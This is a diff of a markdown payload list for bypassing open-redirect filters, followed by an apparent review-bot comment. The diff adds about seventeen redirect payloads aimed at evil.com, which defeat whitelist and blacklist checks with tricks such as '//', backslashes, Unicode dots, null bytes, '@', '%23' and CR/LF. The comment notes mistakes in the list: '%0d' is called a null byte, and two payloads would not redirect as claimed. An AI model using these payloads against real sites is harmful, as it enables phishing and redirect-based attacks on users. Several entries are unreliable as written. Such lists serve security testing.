1 | | - | ## Filter Bypass |
| 1 | + | ## Open Redirect |
2 | 2 | | |
3 | | - | 1. Using a whitelisted domain or keyword |
| 3 | + | 1. Try change the domain |
4 | 4 | | ``` |
5 | | - | target.com.evil.com |
| 5 | + | /?redir=evil.com |
6 | 6 | | ``` |
7 | 7 | | |
8 | | - | 2. Using "//" to bypass "http" blacklisted keyword |
| 8 | + | 2. Using a whitelisted domain or keyword |
9 | 9 | | ``` |
10 | | - | //evil.com |
| 10 | + | /?redir=target.com.evil.com |
11 | 11 | | ``` |
12 | 12 | | |
13 | | - | 3. Using "https:" to bypass "//" blacklisted keyword |
| 13 | + | 3. Using `//` to bypass `http` blacklisted keyword |
14 | 14 | | ``` |
15 | | - | https:evil.com |
| 15 | + | /?redir=//evil.com |
16 | 16 | | ``` |
17 | 17 | | |
18 | | - | 4. Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //) |
| 18 | + | 4. Using `https:` to bypass `//` blacklisted keyword |
19 | 19 | | ``` |
20 | | - | \/\/evil.com/ |
21 | | - | /\/evil.com/ |
| 20 | + | /?redir=https:evil.com |
22 | 21 | | ``` |
23 | 22 | | |
24 | | - | 5. Using "%E3%80%82" to bypass "." blacklisted character |
| 23 | + | 5. Using `\\` to bypass `//` blacklisted keyword |
| 24 | + | ``` |
| 25 | + | /?redir=\\evil.com |
| 26 | + | ``` |
| 27 | + | |
| 28 | + | 6. Using `\/\/` to bypass `//` blacklisted keyword |
| 29 | + | ``` |
| 30 | + | /?redir=\/\/evil.com/ |
| 31 | + | /?redir=/\/evil.com/ |
| 32 | + | ``` |
| 33 | + | |
| 34 | + | 7. Using `%E3%80%82` to bypass `.` blacklisted character |
25 | 35 | | ``` |
26 | 36 | | /?redir=evil。com |
27 | 37 | | /?redir=evil%E3%80%82com |
28 | 38 | | ``` |
29 | 39 | | |
30 | | - | 6. Using null byte "%00" to bypass blacklist filter |
| 40 | + | 8. Using null byte `%00` to bypass blacklist filter |
31 | 41 | | ``` |
32 | | - | //evil%00.com |
| 42 | + | /?redir=//evil%00.com |
33 | 43 | | ``` |
34 | 44 | | |
35 | | - | 7. Using parameter pollution |
| 45 | + | 9. Using parameter pollution |
36 | 46 | | ``` |
37 | | - | ?next=target.com&next=evil.com |
| 47 | + | /?next=target.com&next=evil.com |
38 | 48 | | ``` |
39 | 49 | | |
40 | | - | 8. Using "@" character, browser will redirect to anything after the "@" |
| 50 | + | 10. Using `@` or `%40` character, browser will redirect to anything after the `@` |
41 | 51 | | ``` |
42 | | - | [email protected] |
43 | | - | target.com%40evil.com |
| 52 | + | /?redir=[email protected] |
| 53 | + | /?redir=target.com%40evil.com |
44 | 54 | | ``` |
45 | 55 | | |
46 | | - | 9. Creating folder as their domain |
| 56 | + | 11. Creating folder as their domain |
47 | 57 | | ``` |
48 | 58 | | http://www.yoursite.com/http://www.theirsite.com/ |
49 | 59 | | http://www.yoursite.com/folder/www.folder.com |
50 | 60 | | ``` |
51 | 61 | | |
52 | | - | 10. Using "?" characted, browser will translate it to "/?" |
| 62 | + | 12. Using `?` characted, browser will translate it to `/?` |
53 | 63 | | ``` |
54 | | - | http://www.yoursite.com?http://www.theirsite.com/ |
55 | | - | http://www.yoursite.com?folder/www.folder.com |
| 64 | + | /?redir=target.com?evil.com |
56 | 65 | | ``` |
57 | 66 | | |
58 | | - | 11. Host/Split Unicode Normalization |
| 67 | + | 13. Bypass the filter if it only checks for domain name using `%23` |
| 68 | + | ``` |
| 69 | + | /?redir=target.com%23evil.com |
| 70 | + | ``` |
| 71 | + | |
| 72 | + | 14. Host/Split Unicode Normalization |
59 | 73 | | ``` |
60 | 74 | | https://evil.c℀.example.com |
61 | 75 | | ``` |
62 | 76 | | |
63 | | - | 12. Using parsing |
| 77 | + | 15. Using parsing |
64 | 78 | | ``` |
65 | 79 | | http://ⓔⓥⓘⓛ.ⓒⓞⓜ |
66 | 80 | | ``` |
| 81 | + | |
| 82 | + | 16. Using `°` symbol to bypass |
| 83 | + | ``` |
| 84 | + | /?redir=target.com/°evil.com |
| 85 | + | ``` |
| 86 | + | |
| 87 | + | 17. Bypass the filter if it only allows yoou to control the path using a nullbyte `%0d` or `%0a` |
| 88 | + | ``` |
| 89 | + | /?redir=/%0d/evil.com |
| 90 | + | ``` |
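Review bot: item 17 of the new list (new lines 87-89, "Bypass the filter if it only allows yoou to control the path using a nullbyte `%0d` or `%0a`") mislabels `%0d` and `%0a` as a null byte; they are carriage return and line feed, and the null byte is already covered by item 8 (`%00`), so reword this to "a CR or LF character" and fix the typo `yoou`. Item 12 (new line 62) still carries the typo `characted`. Items 12 and 13 as written (`target.com?evil.com`, `target.com%23evil.com`) resolve to a host of `target.com`, with `evil.com` landing in the query string and the fragment respectively, so neither payload sends the browser to `evil.com`; either reverse the order (for example `evil.com%23target.com`, which defeats a filter that only checks that the whitelisted domain appears somewhere in the value) or explain what the payload is meant to test. Item 16 (`/?redir=target.com/°evil.com`) gives no hint of which filter behaviour the `°` character defeats, unlike every other entry, and needs a one-line explanation. Items 5 and 6 both bypass a `//` blacklist by substituting backslashes and could be merged into one entry listing `\\evil.com`, `\/\/evil.com/` and `/\/evil.com/`. The heading change from `## Filter Bypass` to `## Open Redirect` drops the information that every entry below is a filter bypass, so consider keeping the original heading or restoring it as a sub-heading. Finally, the first payload of item 10 is rendered as `[email protected]` in this view, which looks like an e-mail obfuscation artifact rather than the intended payload; check that the committed file actually contains the plain `@` form that the `%40` payload on the following line encodes.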